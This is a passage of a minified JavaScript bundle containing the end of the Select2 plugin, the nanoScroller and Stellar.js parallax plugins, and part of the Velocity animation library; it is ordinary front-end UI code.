e}),e.define("jquery.select2",["jquery","jquery-mousewheel","./select2/core","./select2/defaults"],function(o,e,s,t){if(null==o.fn.select2){var a=["open","close","destroy"];o.fn.select2=function(t){if("object"==typeof(t=t||{}))return this.each(function(){var e=o.extend(!0,{},t);new s(o(this),e)}),this;if("string"==typeof t){var i,n=Array.prototype.slice.call(arguments,1);return this.each(function(){var e=o(this).data("select2");null==e&&window.console&&console.error&&console.error("The select2('"+t+"') method was called on an element that is not using Select2."),i=e[t].apply(e,n)}),-1<o.inArray(t,a)?this:i}throw new Error("Invalid arguments for Select2: "+t)}}return null==o.fn.select2.defaults&&(o.fn.select2.defaults=t),s}),{define:e.define,require:e.require}}(),t=e.require("jquery.select2");return i.fn.select2.amd=e,t}),function(n,o,s){"use strict";var l,c,i,a,r,u,t,d,h,p,f,m,g,v,y,w,b;p={paneClass:"pane",sliderClass:"slider",contentClass:"content",iOSNativeScrolling:!1,preventPageScrolling:!1,disableResize:!1,alwaysVisible:!1,flashDelay:1500,sliderMinHeight:20,sliderMaxHeight:null,documentContext:null,windowContext:null},d="scroll",r="mousewheel",t="resize",i="DOMMouseScroll",a="down",l="Microsoft Internet Explorer"===o.navigator.appName&&/msie 7./i.test(o.navigator.appVersion)&&o.ActiveXObject,c=null,v=o.requestAnimationFrame,h=o.cancelAnimationFrame,w=s.createElement("div").style,b=function(){var e,t,i,n;for(e=i=0,n=(t=["t","webkitT","MozT","msT","OT"]).length;i<n;e=++i)if(t[e],t[e]+"ransform"in w)return t[e].substr(0,t[e].length-1);return!1}(),y=function(e){return!1!==b&&(""===b?e:b+e.charAt(0).toUpperCase()+e.substr(1))}("transform"),m=!1!==y,f=function(){var e,t,i;return(t=(e=s.createElement("div")).style).position="absolute",t.width="100px",t.height="100px",t.overflow=d,t.top="-9999px",s.body.appendChild(e),i=e.offsetWidth-e.clientWidth,s.body.removeChild(e),i},g=function(){var e,t,i;return t=o.navigator.userAgent,!!(e=/(?=.+Mac OS X)(?=.+Firefox)/.test(t))&&((i=/Firefox\/\d{2}\./.exec(t))&&(i=i[0].replace(/\D+/g,"")),e&&23<+i)},u=function(){function e(e,t){this.el=e,this.options=t,c||(c=f()),this.$el=n(this.el),this.doc=n(this.options.documentContext||s),this.win=n(this.options.windowContext||o),this.$content=this.$el.children("."+t.contentClass),this.$content.attr("tabindex",this.options.tabIndex||0),this.content=this.$content[0],this.options.iOSNativeScrolling&&null!=this.el.style.WebkitOverflowScrolling?this.nativeScrolling():this.generate(),this.createEvents(),this.addEvents(),this.reset()}return e.prototype.preventScrolling=function(e,t){if(this.isActive)if(e.type===i)(t===a&&0<e.originalEvent.detail||"up"===t&&e.originalEvent.detail<0)&&e.preventDefault();else if(e.type===r){if(!e.originalEvent||!e.originalEvent.wheelDelta)return;(t===a&&e.originalEvent.wheelDelta<0||"up"===t&&0<e.originalEvent.wheelDelta)&&e.preventDefault()}},e.prototype.nativeScrolling=function(){this.$content.css({WebkitOverflowScrolling:"touch"}),this.iOSNativeScrolling=!0,this.isActive=!0},e.prototype.updateScrollValues=function(){var e;e=this.content,this.maxScrollTop=e.scrollHeight-e.clientHeight,this.prevScrollTop=this.contentScrollTop||0,this.contentScrollTop=e.scrollTop,this.iOSNativeScrolling||(this.maxSliderTop=this.paneHeight-this.sliderHeight,this.sliderTop=0===this.maxScrollTop?0:this.contentScrollTop*this.maxSliderTop/this.maxScrollTop)},e.prototype.setOnScrollStyles=function(){var e,t=this;m?(e={})[y]="translate(0, "+this.sliderTop+"px)":e={top:this.sliderTop},v?this.scrollRAF||(this.scrollRAF=v(function(){t.scrollRAF=null,t.slider.css(e)})):this.slider.css(e)},e.prototype.createEvents=function(){var i=this;this.events={down:function(e){return i.isBeingDragged=!0,i.offsetY=e.pageY-i.slider.offset().top,i.pane.addClass("active"),i.doc.bind("mousemove",i.events.drag).bind("mouseup",i.events.up),!1},drag:function(e){return i.sliderY=e.pageY-i.$el.offset().top-i.offsetY,i.scroll(),i.contentScrollTop>=i.maxScrollTop&&i.prevScrollTop!==i.maxScrollTop?i.$el.trigger("scrollend"):0===i.contentScrollTop&&0!==i.prevScrollTop&&i.$el.trigger("scrolltop"),!1},up:function(){return i.isBeingDragged=!1,i.pane.removeClass("active"),i.doc.unbind("mousemove",i.events.drag).unbind("mouseup",i.events.up),!1},resize:function(){i.reset()},panedown:function(e){return i.sliderY=(e.offsetY||e.originalEvent.layerY)-.5*i.sliderHeight,i.scroll(),i.events.down(e),!1},scroll:function(e){i.updateScrollValues(),i.isBeingDragged||(i.iOSNativeScrolling||(i.sliderY=i.sliderTop,i.setOnScrollStyles()),null!=e&&(i.contentScrollTop>=i.maxScrollTop?(i.options.preventPageScrolling&&i.preventScrolling(e,a),i.prevScrollTop!==i.maxScrollTop&&i.$el.trigger("scrollend")):0===i.contentScrollTop&&(i.options.preventPageScrolling&&i.preventScrolling(e,"up"),0!==i.prevScrollTop&&i.$el.trigger("scrolltop"))))},wheel:function(e){var t;if(null!=e)return(t=e.delta||e.wheelDelta||e.originalEvent&&e.originalEvent.wheelDelta||-e.detail||e.originalEvent&&-e.originalEvent.detail)&&(i.sliderY+=-t/3),i.scroll(),!1}}},e.prototype.addEvents=function(){var e;this.removeEvents(),e=this.events,this.options.disableResize||this.win.bind(t,e[t]),this.iOSNativeScrolling||(this.slider.bind("mousedown",e.down),this.pane.bind("mousedown",e.panedown).bind(r+" "+i,e.wheel)),this.$content.bind(d+" "+r+" "+i+" touchmove",e[d])},e.prototype.removeEvents=function(){var e;e=this.events,this.win.unbind(t,e[t]),this.iOSNativeScrolling||(this.slider.unbind(),this.pane.unbind()),this.$content.unbind(d+" "+r+" "+i+" touchmove",e[d])},e.prototype.generate=function(){var e,t,i,n;return i=(t=this.options).paneClass,n=t.sliderClass,t.contentClass,this.$el.find("."+i).length||this.$el.find("."+n).length||this.$el.append('<div class="'+i+'"><div class="'+n+'" /></div>'),this.pane=this.$el.children("."+i),this.slider=this.pane.find("."+n),0===c&&g()?e={right:-14,paddingRight:+o.getComputedStyle(this.content,null).getPropertyValue("padding-right").replace(/\D+/g,"")+14}:c&&(e={right:-c},this.$el.addClass("has-scrollbar")),null!=e&&this.$content.css(e),this},e.prototype.restore=function(){this.stopped=!1,this.iOSNativeScrolling||this.pane.show(),this.addEvents()},e.prototype.reset=function(){var e,t,i,n,o,s,a,r;return this.iOSNativeScrolling?void(this.contentHeight=this.content.scrollHeight):(this.$el.find("."+this.options.paneClass).length||this.generate().stop(),this.stopped&&this.restore(),n=(i=(e=this.content).style).overflowY,l&&this.$content.css({height:this.$content.height()}),t=e.scrollHeight+c,0<(a=parseInt(this.$el.css("max-height"),10))&&(this.$el.height(""),this.$el.height(e.scrollHeight>a?a:e.scrollHeight)),s=(o=this.pane.outerHeight(!1))+parseInt(this.pane.css("top"),10)+parseInt(this.pane.css("bottom"),10),(r=Math.round(s/t*s))<this.options.sliderMinHeight?r=this.options.sliderMinHeight:null!=this.options.sliderMaxHeight&&r>this.options.sliderMaxHeight&&(r=this.options.sliderMaxHeight),n===d&&i.overflowX!==d&&(r+=c),this.maxSliderTop=s-r,this.contentHeight=t,this.paneHeight=o,this.paneOuterHeight=s,this.sliderHeight=r,this.slider.height(r),this.events.scroll(),this.pane.show(),this.isActive=!0,e.scrollHeight===e.clientHeight||this.pane.outerHeight(!0)>=e.scrollHeight&&n!==d?(this.pane.hide(),this.isActive=!1):this.el.clientHeight===e.scrollHeight&&n===d?this.slider.hide():this.slider.show(),this.pane.css({opacity:this.options.alwaysVisible?1:"",visibility:this.options.alwaysVisible?"visible":""}),this)},e.prototype.scroll=function(){return this.isActive?(this.sliderY=Math.max(0,this.sliderY),this.sliderY=Math.min(this.maxSliderTop,this.sliderY),this.$content.scrollTop((this.paneHeight-this.contentHeight+c)*this.sliderY/this.maxSliderTop*-1),this.iOSNativeScrolling||(this.updateScrollValues(),this.setOnScrollStyles()),this):void 0},e.prototype.scrollBottom=function(e){return this.isActive?(this.reset(),this.$content.scrollTop(this.contentHeight-this.$content.height()-e).trigger(r),this):void 0},e.prototype.scrollTop=function(e){return this.isActive?(this.reset(),this.$content.scrollTop(+e).trigger(r),this):void 0},e.prototype.scrollTo=function(e){return this.isActive?(this.reset(),this.scrollTop(this.$el.find(e).get(0).offsetTop),this):void 0},e.prototype.stop=function(){return h&&this.scrollRAF&&(h(this.scrollRAF),this.scrollRAF=null),this.stopped=!0,this.removeEvents(),this.iOSNativeScrolling||this.pane.hide(),this},e.prototype.destroy=function(){return this.stopped||this.stop(),!this.iOSNativeScrolling&&this.pane.length&&this.pane.remove(),l&&this.$content.height(""),this.$content.removeAttr("tabindex"),this.$el.hasClass("has-scrollbar")&&(this.$el.removeClass("has-scrollbar"),this.$content.css({right:""})),this},e.prototype.flash=function(){var e=this;if(!this.iOSNativeScrolling&&this.isActive)return this.reset(),this.pane.addClass("flashed"),setTimeout(function(){e.pane.removeClass("flashed")},this.options.flashDelay),this},e}(),n.fn.nanoScroller=function(i){return this.each(function(){var e,t;if((t=this.nanoscroller)||(e=n.extend({},p,i),this.nanoscroller=t=new u(this,e)),i&&"object"==typeof i){if(n.extend(t.options,i),null!=i.scrollBottom)return t.scrollBottom(i.scrollBottom);if(null!=i.scrollTop)return t.scrollTop(i.scrollTop);if(i.scrollTo)return t.scrollTo(i.scrollTo);if("bottom"===i.scroll)return t.scrollBottom(0);if("top"===i.scroll)return t.scrollTop(0);if(i.scroll&&i.scroll instanceof n)return t.scrollTo(i.scroll);if(i.stop)return t.stop();if(i.destroy)return t.destroy();if(i.flash)return t.flash()}return t.reset()})},n.fn.nanoScroller.Constructor=u}(jQuery,window,document),function(g,o,e,v){function n(e,t){this.element=e,this.options=g.extend({},i,t),this._defaults=i,this._name=s,this.init()}var s="stellar",i={scrollProperty:"scroll",positionProperty:"position",horizontalScrolling:!0,verticalScrolling:!0,horizontalOffset:0,verticalOffset:0,responsive:!1,parallaxBackgrounds:!0,parallaxElements:!0,hideDistantElements:!0,hideElement:function(e){e.hide()},showElement:function(e){e.show()}},r={scroll:{getLeft:function(e){return e.scrollLeft()},setLeft:function(e,t){e.scrollLeft(t)},getTop:function(e){return e.scrollTop()},setTop:function(e,t){e.scrollTop(t)}},position:{getLeft:function(e){return-1*parseInt(e.css("left"),10)},getTop:function(e){return-1*parseInt(e.css("top"),10)}},margin:{getLeft:function(e){return-1*parseInt(e.css("margin-left"),10)},getTop:function(e){return-1*parseInt(e.css("margin-top"),10)}},transform:{getLeft:function(e){var t=getComputedStyle(e[0])[a];return"none"!==t?-1*parseInt(t.match(/(-?[0-9]+)/g)[4],10):0},getTop:function(e){var t=getComputedStyle(e[0])[a];return"none"!==t?-1*parseInt(t.match(/(-?[0-9]+)/g)[5],10):0}}},l={position:{setLeft:function(e,t){e.css("left",t)},setTop:function(e,t){e.css("top",t)}},transform:{setPosition:function(e,t,i,n,o){e[0].style[a]="translate3d("+(t-i)+"px, "+(n-o)+"px, 0)"}}},a=function(){var e,t=/^(Moz|Webkit|Khtml|O|ms|Icab)(?=[A-Z])/,i=g("script")[0].style,n="";for(e in i)if(t.test(e)){n=e.match(t)[0];break}return"WebkitOpacity"in i&&(n="Webkit"),"KhtmlOpacity"in i&&(n="Khtml"),function(e){return n+(0<n.length?e.charAt(0).toUpperCase()+e.slice(1):e)}}()("transform"),t=g("<div />",{style:"background:#fff"}).css("background-position-x")!==v,y=t?function(e,t,i){e.css({"background-position-x":t,"background-position-y":i})}:function(e,t,i){e.css("background-position",t+" "+i)},w=t?function(e){return[e.css("background-position-x"),e.css("background-position-y")]}:function(e){return e.css("background-position").split(" ")},c=o.requestAnimationFrame||o.webkitRequestAnimationFrame||o.mozRequestAnimationFrame||o.oRequestAnimationFrame||o.msRequestAnimationFrame||function(e){setTimeout(e,1e3/60)};n.prototype={init:function(){this.options.name=s+"_"+Math.floor(1e9*Math.random()),this._defineElements(),this._defineGetters(),this._defineSetters(),this._handleWindowLoadAndResize(),this._detectViewport(),this.refresh({firstLoad:!0}),"scroll"===this.options.scrollProperty?this._handleScrollEvent():this._startAnimationLoop()},_defineElements:function(){this.element===e.body&&(this.element=o),this.$scrollElement=g(this.element),this.$element=this.element===o?g("body"):this.$scrollElement,this.$viewportElement=this.options.viewportElement!==v?g(this.options.viewportElement):this.$scrollElement[0]===o||"scroll"===this.options.scrollProperty?this.$scrollElement:this.$scrollElement.parent()},_defineGetters:function(){var e=this,t=r[e.options.scrollProperty];this._getScrollLeft=function(){return t.getLeft(e.$scrollElement)},this._getScrollTop=function(){return t.getTop(e.$scrollElement)}},_defineSetters:function(){var s=this,e=r[s.options.scrollProperty],a=l[s.options.positionProperty],t=e.setLeft,i=e.setTop;this._setScrollLeft="function"==typeof t?function(e){t(s.$scrollElement,e)}:g.noop,this._setScrollTop="function"==typeof i?function(e){i(s.$scrollElement,e)}:g.noop,this._setPosition=a.setPosition||function(e,t,i,n,o){s.options.horizontalScrolling&&a.setLeft(e,t,i),s.options.verticalScrolling&&a.setTop(e,n,o)}},_handleWindowLoadAndResize:function(){var e=this,t=g(o);e.options.responsive&&t.bind("load."+this.name,function(){e.refresh()}),t.bind("resize."+this.name,function(){e._detectViewport(),e.options.responsive&&e.refresh()})},refresh:function(e){var i=this,t=i._getScrollLeft(),n=i._getScrollTop();e&&e.firstLoad||this._reset(),this._setScrollLeft(0),this._setScrollTop(0),this._setOffsets(),this._findParticles(),this._findBackgrounds(),e&&e.firstLoad&&/WebKit/.test(navigator.userAgent)&&g(o).load(function(){var e=i._getScrollLeft(),t=i._getScrollTop();i._setScrollLeft(e+1),i._setScrollTop(t+1),i._setScrollLeft(e),i._setScrollTop(t)}),this._setScrollLeft(t),this._setScrollTop(n)},_detectViewport:function(){var e=this.$viewportElement.offset(),t=null!==e&&e!==v;this.viewportWidth=this.$viewportElement.width(),this.viewportHeight=this.$viewportElement.height(),this.viewportOffsetTop=t?e.top:0,this.viewportOffsetLeft=t?e.left:0},_findParticles:function(){var f=this;if(this._getScrollLeft(),this._getScrollTop(),this.particles!==v)for(var e=this.particles.length-1;0<=e;e--)this.particles[e].$element.data("stellar-elementIsActive",v);this.particles=[],this.options.parallaxElements&&this.$element.find("[data-stellar-ratio]").each(function(){var e,t,i,n,o,s,a,r,l,c=g(this),u=0,d=0,h=0,p=0;if(c.data("stellar-elementIsActive")){if(c.data("stellar-elementIsActive")!==this)return}else c.data("stellar-elementIsActive",this);f.options.showElement(c),c.data("stellar-startingLeft")?(c.css("left",c.data("stellar-startingLeft")),c.css("top",c.data("stellar-startingTop"))):(c.data("stellar-startingLeft",c.css("left")),c.data("stellar-startingTop",c.css("top"))),i=c.position().left,n=c.position().top,o="auto"===c.css("margin-left")?0:parseInt(c.css("margin-left"),10),s="auto"===c.css("margin-top")?0:parseInt(c.css("margin-top"),10),r=c.offset().left-o,l=c.offset().top-s,c.parents().each(function(){var e=g(this);return!0===e.data("stellar-offset-parent")?(u=h,d=p,a=e,!1):(h+=e.position().left,void(p+=e.position().top))}),e=c.data("stellar-horizontal-offset")!==v?c.data("stellar-horizontal-offset"):a!==v&&a.data("stellar-horizontal-offset")!==v?a.data("stellar-horizontal-offset"):f.horizontalOffset,t=c.data("stellar-vertical-offset")!==v?c.data("stellar-vertical-offset"):a!==v&&a.data("stellar-vertical-offset")!==v?a.data("stellar-vertical-offset"):f.verticalOffset,f.particles.push({$element:c,$offsetParent:a,isFixed:"fixed"===c.css("position"),horizontalOffset:e,verticalOffset:t,startingPositionLeft:i,startingPositionTop:n,startingOffsetLeft:r,startingOffsetTop:l,parentOffsetLeft:u,parentOffsetTop:d,stellarRatio:c.data("stellar-ratio")!==v?c.data("stellar-ratio"):1,width:c.outerWidth(!0),height:c.outerHeight(!0),isHidden:!1})})},_findBackgrounds:function(){var e,p=this,f=this._getScrollLeft(),m=this._getScrollTop();this.backgrounds=[],this.options.parallaxBackgrounds&&(e=this.$element.find("[data-stellar-background-ratio]"),this.$element.data("stellar-background-ratio")&&(e=e.add(this.$element)),e.each(function(){var e,t,i,n,o,s,a,r=g(this),l=w(r),c=0,u=0,d=0,h=0;if(r.data("stellar-backgroundIsActive")){if(r.data("stellar-backgroundIsActive")!==this)return}else r.data("stellar-backgroundIsActive",this);r.data("stellar-backgroundStartingLeft")?y(r,r.data("stellar-backgroundStartingLeft"),r.data("stellar-backgroundStartingTop")):(r.data("stellar-backgroundStartingLeft",l[0]),r.data("stellar-backgroundStartingTop",l[1])),i="auto"===r.css("margin-left")?0:parseInt(r.css("margin-left"),10),n="auto"===r.css("margin-top")?0:parseInt(r.css("margin-top"),10),o=r.offset().left-i-f,s=r.offset().top-n-m,r.parents().each(function(){var e=g(this);return!0===e.data("stellar-offset-parent")?(c=d,u=h,a=e,!1):(d+=e.position().left,void(h+=e.position().top))}),e=r.data("stellar-horizontal-offset")!==v?r.data("stellar-horizontal-offset"):a!==v&&a.data("stellar-horizontal-offset")!==v?a.data("stellar-horizontal-offset"):p.horizontalOffset,t=r.data("stellar-vertical-offset")!==v?r.data("stellar-vertical-offset"):a!==v&&a.data("stellar-vertical-offset")!==v?a.data("stellar-vertical-offset"):p.verticalOffset,p.backgrounds.push({$element:r,$offsetParent:a,isFixed:"fixed"===r.css("background-attachment"),horizontalOffset:e,verticalOffset:t,startingValueLeft:l[0],startingValueTop:l[1],startingBackgroundPositionLeft:isNaN(parseInt(l[0],10))?0:parseInt(l[0],10),startingBackgroundPositionTop:isNaN(parseInt(l[1],10))?0:parseInt(l[1],10),startingPositionLeft:r.position().left,startingPositionTop:r.position().top,startingOffsetLeft:o,startingOffsetTop:s,parentOffsetLeft:c,parentOffsetTop:u,stellarRatio:r.data("stellar-background-ratio")===v?1:r.data("stellar-background-ratio")})}))},_reset:function(){var e,t,i,n,o;for(o=this.particles.length-1;0<=o;o--)t=(e=this.particles[o]).$element.data("stellar-startingLeft"),i=e.$element.data("stellar-startingTop"),this._setPosition(e.$element,t,t,i,i),this.options.showElement(e.$element),e.$element.data("stellar-startingLeft",null).data("stellar-elementIsActive",null).data("stellar-backgroundIsActive",null);for(o=this.backgrounds.length-1;0<=o;o--)(n=this.backgrounds[o]).$element.data("stellar-backgroundStartingLeft",null).data("stellar-backgroundStartingTop",null),y(n.$element,n.startingValueLeft,n.startingValueTop)},destroy:function(){this._reset(),this.$scrollElement.unbind("resize."+this.name).unbind("scroll."+this.name),this._animationLoop=g.noop,g(o).unbind("load."+this.name).unbind("resize."+this.name)},_setOffsets:function(){var e=this,t=g(o);t.unbind("resize.horizontal-"+this.name).unbind("resize.vertical-"+this.name),"function"==typeof this.options.horizontalOffset?(this.horizontalOffset=this.options.horizontalOffset(),t.bind("resize.horizontal-"+this.name,function(){e.horizontalOffset=e.options.horizontalOffset()})):this.horizontalOffset=this.options.horizontalOffset,"function"==typeof this.options.verticalOffset?(this.verticalOffset=this.options.verticalOffset(),t.bind("resize.vertical-"+this.name,function(){e.verticalOffset=e.options.verticalOffset()})):this.verticalOffset=this.options.verticalOffset},_repositionElements:function(){var e,t,i,n,o,s,a,r,l,c,u=this._getScrollLeft(),d=this._getScrollTop(),h=!0,p=!0;if(this.currentScrollLeft!==u||this.currentScrollTop!==d||this.currentWidth!==this.viewportWidth||this.currentHeight!==this.viewportHeight){for(this.currentScrollLeft=u,this.currentScrollTop=d,this.currentWidth=this.viewportWidth,this.currentHeight=this.viewportHeight,c=this.particles.length-1;0<=c;c--)t=(e=this.particles[c]).isFixed?1:0,this.options.horizontalScrolling?r=(s=(u+e.horizontalOffset+this.viewportOffsetLeft+e.startingPositionLeft-e.startingOffsetLeft+e.parentOffsetLeft)*-(e.stellarRatio+t-1)+e.startingPositionLeft)-e.startingPositionLeft+e.startingOffsetLeft:(s=e.startingPositionLeft,r=e.startingOffsetLeft),this.options.verticalScrolling?l=(a=(d+e.verticalOffset+this.viewportOffsetTop+e.startingPositionTop-e.startingOffsetTop+e.parentOffsetTop)*-(e.stellarRatio+t-1)+e.startingPositionTop)-e.startingPositionTop+e.startingOffsetTop:(a=e.startingPositionTop,l=e.startingOffsetTop),this.options.hideDistantElements&&(p=!this.options.horizontalScrolling||r+e.width>(e.isFixed?0:u)&&r<(e.isFixed?0:u)+this.viewportWidth+this.viewportOffsetLeft,h=!this.options.verticalScrolling||l+e.height>(e.isFixed?0:d)&&l<(e.isFixed?0:d)+this.viewportHeight+this.viewportOffsetTop),p&&h?(e.isHidden&&(this.options.showElement(e.$element),e.isHidden=!1),this._setPosition(e.$element,s,e.startingPositionLeft,a,e.startingPositionTop)):e.isHidden||(this.options.hideElement(e.$element),e.isHidden=!0);for(c=this.backgrounds.length-1;0<=c;c--)t=(i=this.backgrounds[c]).isFixed?0:1,n=this.options.horizontalScrolling?(u+i.horizontalOffset-this.viewportOffsetLeft-i.startingOffsetLeft+i.parentOffsetLeft-i.startingBackgroundPositionLeft)*(t-i.stellarRatio)+"px":i.startingValueLeft,o=this.options.verticalScrolling?(d+i.verticalOffset-this.viewportOffsetTop-i.startingOffsetTop+i.parentOffsetTop-i.startingBackgroundPositionTop)*(t-i.stellarRatio)+"px":i.startingValueTop,y(i.$element,n,o)}},_handleScrollEvent:function(){var e=this,t=!1,i=function(){e._repositionElements(),t=!1},n=function(){t||(c(i),t=!0)};this.$scrollElement.bind("scroll."+this.name,n),n()},_startAnimationLoop:function(){var e=this;this._animationLoop=function(){c(e._animationLoop),e._repositionElements()},this._animationLoop()}},g.fn[s]=function(t){var i=arguments;return t===v||"object"==typeof t?this.each(function(){g.data(this,"plugin_"+s)||g.data(this,"plugin_"+s,new n(this,t))}):"string"==typeof t&&"_"!==t[0]&&"init"!==t?this.each(function(){var e=g.data(this,"plugin_"+s);e instanceof n&&"function"==typeof e[t]&&e[t].apply(e,Array.prototype.slice.call(i,1)),"destroy"===t&&g.data(this,"plugin_"+s,null)}):void 0},g[s]=function(){var e=g(o);return e.stellar.apply(e,Array.prototype.slice.call(arguments,0))},g[s].scrollProperty=r,g[s].positionProperty=l,o.Stellar=n}(jQuery,this,document),function(t){function r(e){var t=e.length,i=u.type(e);return"function"!==i&&!u.isWindow(e)&&(!(1!==e.nodeType||!t)||("array"===i||0===t||"number"==typeof t&&0<t&&t-1 in e))}if(!t.jQuery){var u=function(e,t){return new u.fn.init(e,t)};u.isWindow=function(e){return null!=e&&e==e.window},u.type=function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?i[o.call(e)]||"object":typeof e},u.isArray=Array.isArray||function(e){return"array"===u.type(e)},u.isPlainObject=function(e){var t;if(!e||"object"!==u.type(e)||e.nodeType||u.isWindow(e))return!1;try{if(e.constructor&&!n.call(e,"constructor")&&!n.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(e){return!1}for(t in e);return void 0===t||n.call(e,t)},u.each=function(e,t,i){var n=0,o=e.length,s=r(e);if(i){if(s)for(;n<o&&!1!==t.apply(e[n],i);n++);else for(n in e)if(!1===t.apply(e[n],i))break}else if(s)for(;n<o&&!1!==t.call(e[n],n,e[n]);n++);else for(n in e)if(!1===t.call(e[n],n,e[n]))break;return e},u.data=function(e,t,i){if(void 0===i){var n=(o=e[u.expando])&&s[o];if(void 0===t)return n;if(n&&t in n)return n[t]}else if(void 0!==t){var o=e[u.expando]||(e[u.expando]=++u.uuid);return s[o]=s[o]||{},s[o][t]=i}},u.removeData=function(e,t){var i=e[u.expando],n=i&&s[i];n&&u.each(t,function(e,t){delete n[t]})},u.extend=function(){var e,t,i,n,o,s,a=arguments[0]||{},r=1,l=arguments.length,c=!1;for("boolean"==typeof a&&(c=a,a=arguments[r]||{},r++),"object"!=typeof a&&"function"!==u.type(a)&&(a={}),r===l&&(a=this,r--);r<l;r++)if(null!=(o=arguments[r]))for(n in o)e=a[n],a!==(i=o[n])&&(c&&i&&(u.isPlainObject(i)||(t=u.isArray(i)))?(t?(t=!1,s=e&&u.isArray(e)?e:[]):s=e&&u.isPlainObject(e)?e:{},a[n]=u.extend(c,s,i)):void 0!==i&&(a[n]=i));return a},u.queue=function(e,t,i){if(e){t=(t||"fx")+"queue";var n=u.data(e,t);return i?(!n||u.isArray(i)?n=u.data(e,t,(a=s||[],null!=(o=i)&&(r(Object(o))?function(e,t){for(var i=+t.length,n=0,o=e.length;n<i;)e[o++]=t[n++];if(i!=i)for(;void 0!==t[n];)e[o++]=t[n++];e.length=o}(a,"string"==typeof o?[o]:o):[].push.call(a,o)),a)):n.push(i),n):n||[]}var o,s,a},u.dequeue=function(e,o){u.each(e.nodeType?[e]:e,function(e,t){o=o||"fx";var i=u.queue(t,o),n=i.shift();"inprogress"===n&&(n=i.shift()),n&&("fx"===o&&i.unshift("inprogress"),n.call(t,function(){u.dequeue(t,o)}))})},u.fn=u.prototype={init:function(e){if(e.nodeType)return this[0]=e,this;throw new Error("Not a DOM node.")},offset:function(){var e=this[0].getBoundingClientRect();return{top:e.top+(t.pageYOffset||document.scrollTop||0)-(document.clientTop||0),left:e.left+(t.pageXOffset||document.scrollLeft||0)-(document.clientLeft||0)}},position:function(){function e(){for(var e=this.offsetParent||document;e&&"html"===!e.nodeType.toLowerCase&&"static"===e.style.position;)e=e.offsetParent;return e||document}var t=this[0],e=e.apply(t),i=this.offset(),n=/^(?:body|html)$/i.test(e.nodeName)?{top:0,left:0}:u(e).offset();return i.top-=parseFloat(t.style.marginTop)||0,i.left-=parseFloat(t.style.marginLeft)||0,e.style&&(n.top+=parseFloat(e.style.borderTopWidth)||0,n.left+=parseFloat(e.style.borderLeftWidth)||0),{top:i.top-n.top,left:i.left-n.left}}};var s={};u.expando="velocity"+(new Date).getTime(),u.uuid=0;for(var i={},n=i.hasOwnProperty,o=i.toString,e="Boolean Number String Function Array Date RegExp Object Error".split(" "),a=0;a<e.length;a++)i["[object "+e[a]+"]"]=e[a].toLowerCase();u.fn.init.prototype=u.fn,t.Velocity={Utilities:u}}}(window),function(e){"object"==typeof module&&"object"==typeof module.exports?module.exports=e():"function"==typeof define&&define.amd?define(e):e()}(function(){return function(e,H,j,R){function f(e){return N.isWrapped(e)?e=[].slice.call(e):N.isNode(e)&&(e=[e]),e}function W(e){var t=B.data(e,"velocity");return null===t?R:t}function n(a,t,r,i){function n(e,t){return 1-3*t+3*e}function o(e,t){return 3*t-6*e}function s(e){return 3*e}function l(e,t,i){return((n(t,i)*e+o(t,i))*e+s(t))*e}function c(e,t,i){return 3*n(t,i)*e*e+2*o(t,i)*e+s(t)}function u(e){for(var t=0,i=1,n=g-1;i!=n&&w[i]<=e;++i)t+=v;var o=t+(e-w[--i])/(w[i+1]-w[i])*v,s=c(o,a,r);return p<=s?function(e,t){for(var i=0;i<h;++i){var n=c(t,a,r);if(0===n)return t;t-=(l(t,a,r)-e)/n}return t}(e,o):0==s?o:function(e,t,i){for(var n,o,s=0;0<(n=l(o=t+(i-t)/2,a,r)-e)?i=o:t=o,Math.abs(n)>f&&++s<m;);return o}(e,t,t+v)}function d(){b=!0,(a!=t||r!=i)&&function(){for(var e=0;e<g;++e)w[e]=l(e*v,a,r)}()}var h=4,p=.001,f=1e-7,m=10,g=11,v=1/(g-1),e="Float32Array"in H;if(4!==arguments.length)return!1;for(var y=0;y<4;++y)if("number"!=typeof arguments[y]||isNaN(arguments[y])||!isFinite(arguments[y]))return!1;a=Math.min(a,1),r=Math.min(r,1),a=Math.max(a,0),r=Math.max(r,0);var w=e?new Float32Array(g):new Array(g),b=!1,_=function(e){return b||d(),a===t&&r===i?e:0===e?0:1===e?1:l(u(e),t,i)};_.getControlPoints=function(){return[{x:a,y:t},{x:r,y:i}]};var x="generateBezier("+[a,t,r,i]+")";return _.toString=function(){return x},_}function F(e,t){var i=e;return N.isString(e)?V.Easings[e]||(i=!1):i=N.isArray(e)&&1===e.length?function(t){return function(e){return Math.round(e*t)*(1/t)}}.apply(null,e):N.isArray(e)&&2===e.length?a.apply(null,e.concat([t])):!(!N.isArray(e)||4!==e.length)&&n.apply(null,e),!1===i&&(i=V.Easings[V.defaults.easing]?V.defaults.easing:s),i}function q(e){if(e)for(var t=(new Date).getTime(),i=0,n=V.State.calls.length;i<n;i++)if(V.State.calls[i]){var o=V.State.calls[i],s=o[0],a=o[2],r=o[3];r||(r=V.State.calls[i][3]=t-16);for(var l=Math.min((t-r)/a.duration,1),c=0,u=s.length;c<u;c++){var d=s[c],h=d.element;if(W(h)){var p=!1;if(a.display!==R&&null!==a.display&&"none"!==a.display){if("flex"===a.display){B.each(["-webkit-box","-moz-box","-ms-flexbox","-webkit-flex"],function(e,t){Y.setPropertyValue(h,"display",t)})}Y.setPropertyValue(h,"display",a.display)}for(var f in a.visibility&&"hidden"!==a.visibility&&Y.setPropertyValue(h,"visibility",a.visibility),d)if("element"!==f){var m,g=d[f],v=N.isString(g.easing)?V.Easings[g.easing]:g.easing;if(m=1===l?g.endValue:g.startValue+(g.endValue-g.startValue)*v(l),g.currentValue=m,Y.Hooks.registered[f]){var y=Y.Hooks.getRoot(f),w=W(h).rootPropertyValueCache[y];w&&(g.rootPropertyValue=w)}var b=Y.setPropertyValue(h,f,g.currentValue+(0===parseFloat(m)?"":g.unitType),g.rootPropertyValue,g.scrollData);Y.Hooks.registered[f]&&(W(h).rootPropertyValueCache[y]=Y.Normalizations.registered[y]?Y.Normalizations.registered[y]("extract",null,b[1]):b[1]),"transform"===b[0]&&(p=!0)}a.mobileHA&&W(h).transformCache.translate3d===R&&(W(h).transformCache.translate3d="(0px, 0px, 0px)",p=!0),p&&Y.flushTransformCache(h)}}a.display!==R&&"none"!==a.display&&(V.State.calls[i][2].display=!1),a.visibility&&"hidden"!==a.visibility&&(V.State.calls[i][2].visibility=!1),a.progress&&a.progress.call(o[1],o[1],l,Math.max(0,r+a.duration-t),r),1===l&&_(i)}V.State.isTicking&&x(q)}function 